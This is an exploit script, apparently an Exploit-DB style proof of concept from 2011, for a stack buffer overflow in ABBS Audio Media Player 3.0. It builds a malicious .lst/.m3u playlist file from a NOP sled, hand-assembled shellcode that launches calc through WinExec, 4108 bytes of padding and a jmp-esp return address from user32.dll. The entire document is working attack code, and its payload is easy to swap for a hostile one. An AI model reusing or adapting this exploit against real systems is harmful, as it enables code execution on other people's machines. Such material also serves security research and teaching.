# Exploit: ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)
# Date: 14.03.11
# Author: Rh0 (Rh0[at]z1p.biz)
# Software Link: https://abbs.qsnx.net/downloads/abbs-amp.zip
# Version: 3.0
# Tested on: WinXP Pro SP3 EN (VirtualBox)
 
print "[*] Stack buffer overflow in ABBS Audio Media Player 3.0 [*]"
bufferlen = 4108;               # buffer until return address overwrite
nops = "\x90" * 5;
## WinExec("calc",1)
shellcode = (
        "\x33\xC0"          # xor eax,eax
        "\x50"              # push eax
        "\x68\x63\x61\x6C\x63"      # push 'calc'
        "\x8B\xDC"          # mov ebx, esp
        "\xB0\x01"          # mov al, 1
        "\x50"              # push eax
        "\x53"              # push ebx
        "\xB8\xAD\x23\x86\x7C"      # mov eax, 7C8623AD
        "\x04\x01"          # add al, 1
        "\xFF\xD0"          # call eax (WinExec@kernel32.dll)
        )
             
ret = "\x53\x93\x42\x7e";           # jmp esp @user32.dll (0x7E429353)
esp = "\xe9\xeb\xef\xff\xff";   # jmp backwards 4116 bytes
 
buffer  = nops
buffer += shellcode
buffer += "A" * (bufferlen - len(buffer))
buffer += ret;
buffer += esp;
 
try:
    A = open("exploit.lst","wb")        # exploit works also with .m3u
    A.write(buffer)
    A.close()
    print "[*] exploit.lst created [*]"
except:
    print "[*] Error while creating file [*]"
 
print "[*] Enter to continue.. [*]"
raw_input()